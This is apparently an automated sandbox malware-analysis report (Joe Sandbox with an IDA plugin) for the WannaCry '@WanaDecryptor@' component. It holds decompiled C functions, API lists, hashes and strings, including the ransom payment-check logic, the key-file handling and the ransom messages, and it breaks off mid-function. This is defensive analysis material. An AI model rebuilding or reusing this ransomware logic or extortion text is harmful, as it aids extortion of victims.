                                                      						_v36 = 2;
                                                      						L00412CC2();
                                                      						_v36 = 0xffffffff;
                                                      						L00412CC2();
                                                      					} else {
                                                      						_push(1);
                                                      						_push( &_v24);
                                                      						_t119 =  *((intOrPtr*)( *_t205));
                                                      						_v36 = _t119;
                                                      						L00412E30();
                                                      						_v12 = 0;
                                                      						_push(_v44);
                                                      						_push(_t119);
                                                      						_t120 =  &_v36;
                                                      						_push(_t120);
                                                      						L00412E2A();
                                                      						_push(_t120);
                                                      						_v24 = 1;
                                                      						L00412D9A();
                                                      						_v28 = 0;
                                                      						L00412CC2();
                                                      						_v28 = 0xffffffff;
                                                      						L00412CC2();
                                                      					}
                                                      					goto L33;
                                                      				}
                                                      				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
                                                      				_t122 =  *(__ecx + 0x74);
                                                      				if(_t179 >= _t122) {
                                                      					goto L6;
                                                      				}
                                                      				_t123 = _t122 - _t179;
                                                      				if(_t123 <= 0) {
                                                      					goto L6;
                                                      				}
                                                      				_t132 = _t123;
                                                      				do {
                                                      					_push( *((intOrPtr*)(__ecx + 0x40)));
                                                      					L00412E36();
                                                      					_t132 = _t132 - 1;
                                                      				} while (_t132 != 0);
                                                      				goto L6;
                                                      			}


















































                                                      APIs
                                                      • #940.MFC42(?), ref: 0040527D
                                                      • #4277.MFC42(?,00000001), ref: 004052A0
                                                      • #923.MFC42(?,00000000,?), ref: 004052B8
                                                      • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
                                                      • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
                                                      • #4129.MFC42(?,?), ref: 004052FC
                                                      • #5710.MFC42 ref: 00405314
                                                      • #922.MFC42(?,00000000,00000000), ref: 00405326
                                                      • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
                                                      • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
                                                      • #940.MFC42(?), ref: 00405396
                                                      • #5710.MFC42(?,?), ref: 004053B8
                                                      • #4129.MFC42(?,?,?,?), ref: 004053D7
                                                      • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
                                                      • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
                                                      • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
                                                      • #4129.MFC42(?,?), ref: 00405443
                                                      • #4277.MFC42(?,?,?,?), ref: 0040545B
                                                      • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
                                                      • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
                                                      • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
                                                      • #6778.MFC42(?,00000001), ref: 004054EA
                                                      • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
                                                      • #6778.MFC42(00000000,?), ref: 00405536
                                                      • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
                                                      • String ID:
                                                      • API String ID: 2121400562-0
                                                      • Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
                                                      • Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
                                                      • Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
                                                      				struct HBRUSH__* _v8;
                                                      				char _v16;
                                                      				char _v28;
                                                      				intOrPtr _v36;
                                                      				char _v52;
                                                      				char _v76;
                                                      				char _v88;
                                                      				intOrPtr _v120;
                                                      				intOrPtr _v124;
                                                      				struct HDC__* _v128;
                                                      				signed int _v132;
                                                      				void* _v136;
                                                      				char _v144;
                                                      				signed int _v148;
                                                      				struct HBRUSH__* _v152;
                                                      				intOrPtr _v156;
                                                      				struct HBRUSH__* _v160;
                                                      				char _v164;
                                                      				void* _v168;
                                                      				long _v172;
                                                      				char _v176;
                                                      				char _v180;
                                                      				struct tagRECT _v196;
                                                      				intOrPtr _v200;
                                                      				char* _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				char _v216;
                                                      				intOrPtr _v220;
                                                      				char _v224;
                                                      				char _v228;
                                                      				struct HBRUSH__* _v232;
                                                      				intOrPtr _v236;
                                                      				char _v240;
                                                      				intOrPtr _v244;
                                                      				intOrPtr _v248;
                                                      				struct HDC__* _v252;
                                                      				char _v256;
                                                      				struct HBRUSH__* _v260;
                                                      				struct HBRUSH__* _v264;
                                                      				char _v268;
                                                      				intOrPtr _v272;
                                                      				intOrPtr _v276;
                                                      				char _v280;
                                                      				struct HBRUSH__* _v284;
                                                      				struct HBRUSH__* _v288;
                                                      				char _v292;
                                                      				intOrPtr _v300;
                                                      				char _v324;
                                                      				signed int _t146;
                                                      				intOrPtr _t148;
                                                      				signed int _t150;
                                                      				void* _t152;
                                                      				intOrPtr _t155;
                                                      				char _t163;
                                                      				char* _t165;
                                                      				RECT* _t177;
                                                      				struct HBRUSH__* _t182;
                                                      				intOrPtr _t206;
                                                      				signed int _t276;
                                                      				intOrPtr _t277;
                                                      				intOrPtr* _t281;
                                                      				void* _t283;
                                                      				long _t284;
                                                      				intOrPtr _t286;
                                                      				intOrPtr _t291;
                                                      				signed long long _t299;
                                                      				signed long long _t301;
                                                      				signed long long _t303;
                                                      
                                                      				_t299 = __fp0;
                                                      				_t283 = __ebp;
                                                      				_push(0xffffffff);
                                                      				_push(E00414055);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t286;
                                                      				_t281 = __ecx;
                                                      				_push(__ecx);
                                                      				L00412DD0();
                                                      				_v8 = 0;
                                                      				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
                                                      				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
                                                      				_push( &_v164);
                                                      				_push( &_v168);
                                                      				L00412FFE();
                                                      				L00412E54();
                                                      				_v16 = 1;
                                                      				E00407640( &_v240);
                                                      				_v240 = 0x41675c;
                                                      				_t206 = _v120;
                                                      				_t146 = 0 | _t206 == 0x00000000;
                                                      				_v16 = 2;
                                                      				_v256 = 0x4166e0;
                                                      				_v228 =  &_v132;
                                                      				_v232 = 0;
                                                      				_v208 = _t146;
                                                      				if(_t146 == 0) {
                                                      					_v244 = _t206;
                                                      					_v248 = _v124;
                                                      					_v252 = _v128;
                                                      				} else {
                                                      					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
                                                      					asm("sbb eax, eax");
                                                      					_push(CreateCompatibleDC( ~( &_v136) & _v132));
                                                      					L00412E4E();
                                                      					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
                                                      					_t35 =  &_v264; // 0x41675c
                                                      					_v260 = E00409F10( &_v280, _t35);
                                                      					_push(_v248);
                                                      					_push(_v252);
                                                      					_push( &_v76);
                                                      					L00412FF8();
                                                      				}
                                                      				_v16 = 3;
                                                      				_v204 =  &_v256;
                                                      				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
                                                      				_t291 = _t148;
                                                      				if(_t291 == 0) {
                                                      					_push( *((intOrPtr*)(_t281 + 0x58)));
                                                      					_push( &_v196);
                                                      					L00412FF2();
                                                      				} else {
                                                      					if(_t291 != 0) {
                                                      						_t182 =  *(_t148 + 4);
                                                      					} else {
                                                      						_t182 = 0;
                                                      					}
                                                      					FillRect(_v252,  &_v196, _t182);
                                                      				}
                                                      				_push(_t281 + 0x74);
                                                      				L00412FEC();
                                                      				_t150 = _v196.top;
                                                      				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
                                                      					_v268 = 0x4166e0;
                                                      					_v28 = 5;
                                                      					if(_v220 == 0) {
                                                      						_v260 = 0;
                                                      						_v264 = 0;
                                                      					} else {
                                                      						_t153 = _v232;
                                                      						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
                                                      						_t155 = _v276;
                                                      						if(_t155 != 0) {
                                                      							_push( *((intOrPtr*)(_t155 + 4)));
                                                      							_push(_v264);
                                                      							L00412E48();
                                                      						} else {
                                                      							_push(0);
                                                      							_push(_v264);
                                                      							L00412E48();
                                                      						}
                                                      					}
                                                      					_v28 = 4;
                                                      				} else {
                                                      					L00412FE6();
                                                      					_v212 = _t150;
                                                      					_t276 = _t150 & 0x00008000;
                                                      					_v148 = _t150 & 0x00002000;
                                                      					_v180 = 0;
                                                      					_v176 = 0;
                                                      					_v168 = 0;
                                                      					_v164 = 0;
                                                      					_v160 = 0;
                                                      					_v152 = 0;
                                                      					if((_t150 & 0x00000004) == 0) {
                                                      						_v156 = _v200 - _v208;
                                                      					} else {
                                                      						_v156 = _v196.left - _v204;
                                                      					}
                                                      					asm("fild dword [esp+0x80]");
                                                      					_push(_t283);
                                                      					_t284 = _v196.right.left;
                                                      					_t163 = _v196.top - _t284;
                                                      					_v272 = _v196.bottom - _t284;
                                                      					asm("fild dword [esp+0x10]");
                                                      					_v272 = _t163;
                                                      					asm("fild dword [esp+0x10]");
                                                      					_t301 = _t299 * st2 / st1;
                                                      					L0041304A();
                                                      					_v172 = _t163;
                                                      					if(_t276 == 0) {
                                                      						st0 = _t301;
                                                      						st0 = _t301;
                                                      					} else {
                                                      						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
                                                      						asm("fild dword [esp+0x10]");
                                                      						_t303 = _t301 * st2 / st1;
                                                      						L0041304A();
                                                      						st0 = _t303;
                                                      						st0 = _t303;
                                                      						_v180 = _t163;
                                                      					}
                                                      					_t277 =  *((intOrPtr*)(_t281 + 0x54));
                                                      					if(_t277 == 0) {
                                                      						_t165 =  &_v180;
                                                      						if(_v148 == 0) {
                                                      							_t165 =  &_v164;
                                                      						}
                                                      						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
                                                      					} else {
                                                      						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
                                                      						if(_t277 != 0) {
                                                      							FillRect(_v264, _t177,  *(_t277 + 4));
                                                      						} else {
                                                      							FillRect(_v264, _t177, 0);
                                                      						}
                                                      					}
                                                      					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
                                                      					_v292 = 0x4166e0;
                                                      					_v52 = 7;
                                                      					if(_v244 == 0) {
                                                      						_v284 = 0;
                                                      						_v288 = 0;
                                                      						_v52 = 6;
                                                      					} else {
                                                      						_t172 = _v256;
                                                      						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
                                                      						_t112 =  &_v324; // 0x4166e0
                                                      						E00409F10(_t112, _v300);
                                                      						_v88 = 6;
                                                      					}
                                                      				}
                                                      				_t133 =  &_v252; // 0x41675c
                                                      				_t152 = E00409E20(_t133);
                                                      				_v28 = 0;
                                                      				L00412E3C();
                                                      				_v28 = 0xffffffff;
                                                      				L00412DB8();
                                                      				 *[fs:0x0] = _v36;
                                                      				return _t152;
                                                      			}

                                                      APIs
                                                      • #470.MFC42 ref: 00408708
                                                      • GetClientRect.USER32(?,?), ref: 0040871F
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                                      • #6734.MFC42(?,?), ref: 00408746
                                                      • #323.MFC42(?,?), ref: 0040874F
                                                      • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                                      • #1640.MFC42(00000000), ref: 004087DD
                                                        • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                                        • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                                      • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                                      • FillRect.USER32(?,?,?), ref: 0040887D
                                                      • #2754.MFC42(?,?), ref: 00408892
                                                      • #2381.MFC42(?,?,?), ref: 0040889F
                                                      • #3797.MFC42(?,?,?), ref: 004088C0
                                                      • _ftol.MSVCRT ref: 00408951
                                                      • _ftol.MSVCRT ref: 0040896F
                                                      • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                                      • #640.MFC42(?,?,?), ref: 00408B09
                                                      • #755.MFC42(?,?,?), ref: 00408B20
                                                        • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                                        • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                                      • String ID: \gA$fA$fA
                                                      • API String ID: 1027735583-2217880857
                                                      • Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                                      • Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
                                                      • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                      • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                      • API String ID: 2817753184-2613825984
                                                      • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                                      • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                                      • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E00401760(void* __ecx) {
                                                      				int _v8;
                                                      				intOrPtr _v12;
                                                      				char _v20;
                                                      				struct _IO_FILE* _v32;
                                                      				void _v2059;
                                                      				void _v2060;
                                                      				void _v2571;
                                                      				void _v2572;
                                                      				char _v2576;
                                                      				char _v2604;
                                                      				void* _v2608;
                                                      				char _v2616;
                                                      				void* _v2636;
                                                      				void* _v2640;
                                                      				void* _t36;
                                                      				struct _IO_FILE* _t37;
                                                      				signed int _t38;
                                                      				unsigned int _t45;
                                                      				signed int _t49;
                                                      				void* _t50;
                                                      				signed int _t67;
                                                      				struct _IO_FILE* _t87;
                                                      				void* _t94;
                                                      				void* _t97;
                                                      				intOrPtr _t98;
                                                      				void* _t99;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134C6);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t98;
                                                      				_t99 = _t98 - 0xa28;
                                                      				_t94 = __ecx;
                                                      				L00412CD4();
                                                      				_t36 =  *(__ecx + 0xac);
                                                      				if(_t36 != 0) {
                                                      					WaitForSingleObject(_t36, 0xbb8);
                                                      					TerminateThread( *(_t94 + 0xac), 0);
                                                      					CloseHandle( *(_t94 + 0xac));
                                                      				}
                                                      				_t37 = E0040C670();
                                                      				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
                                                      					L15:
                                                      					 *[fs:0x0] = _v12;
                                                      					return _t37;
                                                      				} else {
                                                      					_t37 =  *(_t94 + 0xa8);
                                                      					if(_t37 != 1) {
                                                      						if(_t37 != 0xffffffff) {
                                                      							if(_t37 != 2) {
                                                      								goto L15;
                                                      							}
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
                                                      							L14:
                                                      							L00412CC8();
                                                      							goto L15;
                                                      						}
                                                      						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
                                                      							L11:
                                                      							_push(0);
                                                      							_push(0xf0);
                                                      							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                                      							goto L14;
                                                      						}
                                                      						_t38 = rand();
                                                      						asm("cdq");
                                                      						_t37 = _t38 / 3;
                                                      						if(_t38 % 3 != 0) {
                                                      							goto L11;
                                                      						}
                                                      						_push(0);
                                                      						_push(0x30);
                                                      						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
                                                      						goto L14;
                                                      					}
                                                      					_v2572 = 0;
                                                      					memset( &_v2571, 0, 0x7f << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					_v2060 = 0;
                                                      					memset( &_v2059, 0, 0x1ff << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					sprintf( &_v2604, "%08X.dky", 0);
                                                      					_t37 = fopen( &_v2604, "rb");
                                                      					_t87 = _t37;
                                                      					_t99 = _t99 + 0x2c;
                                                      					if(_t87 == 0) {
                                                      						_push(0);
                                                      						_push(0xf0);
                                                      						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
                                                      						L00412CC8();
                                                      						 *(_t94 + 0xa8) = 0xffffffff;
                                                      					} else {
                                                      						_t45 = fread( &_v2060, 1, 0x800, _t87);
                                                      						fclose(_t87);
                                                      						DeleteFileA( &_v2604);
                                                      						_t97 =  &_v2060;
                                                      						_t67 = _t45 >> 2;
                                                      						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
                                                      						_push("You have a new message:\n");
                                                      						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
                                                      						_t99 = _t99 + 0x2c;
                                                      						L00412CAA();
                                                      						_push( &_v2576);
                                                      						_push(_t50);
                                                      						_push( &_v2616);
                                                      						_v8 = 0;
                                                      						L00412CCE();
                                                      						_t37 =  *_t50;
                                                      						_push(0);
                                                      						_push(0x40);
                                                      						_push(_t37);
                                                      						_v20 = 1;
                                                      						L00412CC8();
                                                      						_v32 = 0;
                                                      						L00412CC2();
                                                      						_v32 = 0xffffffff;
                                                      						L00412CC2();
                                                      					}
                                                      					goto L15;
                                                      				}
                                                      			}

                                                      APIs
                                                      • #6453.MFC42 ref: 00401780
                                                      • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
                                                      • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
                                                      • CloseHandle.KERNEL32(?), ref: 004017B2
                                                      • sprintf.MSVCRT ref: 00401811
                                                      • fopen.MSVCRT ref: 00401821
                                                      • fread.MSVCRT ref: 00401844
                                                      • fclose.MSVCRT ref: 0040184D
                                                      • DeleteFileA.KERNEL32(?), ref: 0040185B
                                                      • #537.MFC42(You have a new message:), ref: 00401885
                                                      • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
                                                      • #1200.MFC42 ref: 004018AF
                                                      • #800.MFC42 ref: 004018BF
                                                      • #800.MFC42 ref: 004018D3
                                                      • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
                                                      Strings
                                                      • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
                                                      • %08X.dky, xrefs: 0040180A
                                                      • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
                                                      • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
                                                      • You have a new message:, xrefs: 00401877
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1200#800$#537#6453#924CloseDeleteFileHandleObjectSingleTerminateThreadWaitfclosefopenfreadsprintf
                                                      • String ID: %08X.dky$Congratulations! Your payment has been checked!Start decrypting now!$Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.$You have a new message:
                                                      • API String ID: 2207195628-1375496427
                                                      • Opcode ID: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction ID: 8b94a0d45af64711c1f2f56a46f7a966efbefe6460f93d7d0814001cf74dce0a
                                                      • Opcode Fuzzy Hash: 0124457e6eab98ad7ab5e08ccab151a7b3cccaeabfe0b10511df38693a1a7d3a
                                                      • Instruction Fuzzy Hash: 1D41F371244740EFC330DB64C895BEB7699AB85710F404A3EF25AA32E0DABC5944CB6B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E004012E0(void* __ecx) {
                                                      				int _v4;
                                                      				intOrPtr _v12;
                                                      				void _v2059;
                                                      				void _v2060;
                                                      				void _v2192;
                                                      				void _v2196;
                                                      				intOrPtr _v2324;
                                                      				void _v2328;
                                                      				void _v2332;
                                                      				char _v2364;
                                                      				char _v2396;
                                                      				char _v2436;
                                                      				char _v2468;
                                                      				char _v2508;
                                                      				char _v2540;
                                                      				intOrPtr _t61;
                                                      				long _t65;
                                                      				struct _IO_FILE* _t83;
                                                      				int _t85;
                                                      				intOrPtr _t88;
                                                      				struct _IO_FILE* _t91;
                                                      				int _t97;
                                                      				void* _t100;
                                                      				char* _t123;
                                                      				void _t131;
                                                      				struct _IO_FILE* _t143;
                                                      				struct _IO_FILE* _t146;
                                                      				struct _IO_FILE* _t149;
                                                      				void* _t154;
                                                      				signed int _t156;
                                                      				signed int _t157;
                                                      				intOrPtr _t161;
                                                      				void* _t164;
                                                      				void* _t166;
                                                      				void* _t169;
                                                      				void* _t172;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004134A6);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t161;
                                                      				_t61 =  *0x42189c; // 0x0
                                                      				_push(_t156);
                                                      				_t154 = __ecx;
                                                      				_t3 = _t61 + 0x50c; // 0x50c
                                                      				_t100 = _t3;
                                                      				sprintf( &_v2468, "%08X.pky",  *((intOrPtr*)(__ecx + 0xa4)));
                                                      				sprintf( &_v2540, "%08X.dky",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      				_t164 = _t161 - 0x9e0 + 0x18;
                                                      				_t65 = GetFileAttributesA( &_v2540);
                                                      				_t157 = _t156 | 0xffffffff;
                                                      				if(_t65 == _t157) {
                                                      					L4:
                                                      					_v2196 = 0;
                                                      					memset( &_v2192, 0, 0x21 << 2);
                                                      					_t143 = fopen("00000000.res", "rb");
                                                      					_t166 = _t164 + 0x14;
                                                      					__eflags = _t143;
                                                      					if(_t143 != 0) {
                                                      						fread( &_v2196, 0x88, 1, _t143);
                                                      						fclose(_t143);
                                                      						_v2332 = 0;
                                                      						memset( &_v2328, 0, 0x21 << 2);
                                                      						sprintf( &_v2364, "%08X.res",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      						_t146 = fopen( &_v2364, "rb");
                                                      						_t169 = _t166 + 0x34;
                                                      						__eflags = _t146;
                                                      						if(_t146 != 0) {
                                                      							fread( &_v2332, 0x88, 1, _t146);
                                                      							fclose(_t146);
                                                      							_t131 =  *0x421798; // 0x0
                                                      							_v2060 = _t131;
                                                      							memset( &_v2059, 0, 0x1ff << 2);
                                                      							asm("stosw");
                                                      							asm("stosb");
                                                      							sprintf( &_v2396, "%08X.eky",  *((intOrPtr*)(_t154 + 0xa4)));
                                                      							_t83 = fopen( &_v2396, "rb");
                                                      							_t149 = _t83;
                                                      							_t172 = _t169 + 0x34;
                                                      							__eflags = _t149;
                                                      							if(_t149 != 0) {
                                                      								_t85 = fread( &_v2060, 1, 0x800, _t149);
                                                      								fclose(_t149);
                                                      								_t39 = _t100 + 0x242; // 0x74e
                                                      								_t40 = _t100 + 0x1de; // 0x6ea
                                                      								E0040BE90("s.wnry", _t40, _t39);
                                                      								_t88 =  *0x42189c; // 0x0
                                                      								_push( *((intOrPtr*)(_t154 + 0x20)));
                                                      								_push( &_v2540);
                                                      								_push( *((intOrPtr*)(_t88 + 0x818)));
                                                      								_push( *((intOrPtr*)(_t88 + 0x81c)));
                                                      								_t46 = _t100 + 0xb2; // 0x5be
                                                      								_push(_t85);
                                                      								_push( &_v2060);
                                                      								_push(_v2324);
                                                      								_push( &_v2332);
                                                      								_push( &_v2196);
                                                      								_push(_t100 + 0xe4);
                                                      								_t91 = E0040C240( &_v2332, __eflags);
                                                      								_t172 = _t172 + 0x4c;
                                                      								_t83 = E0040C670();
                                                      								__eflags = _t91;
                                                      								if(_t91 >= 0) {
                                                      									E00404640( &_v2436);
                                                      									_v4 = 1;
                                                      									_t94 = E004047C0( &_v2436,  &_v2468,  &_v2540);
                                                      									__eflags = _t94;
                                                      									if(_t94 == 0) {
                                                      										 *(_t154 + 0xa8) = 1;
                                                      									} else {
                                                      										 *(_t154 + 0xa8) = 2;
                                                      									}
                                                      									_v4 = 0xffffffff;
                                                      									_t123 =  &_v2436;
                                                      									goto L15;
                                                      								}
                                                      							} else {
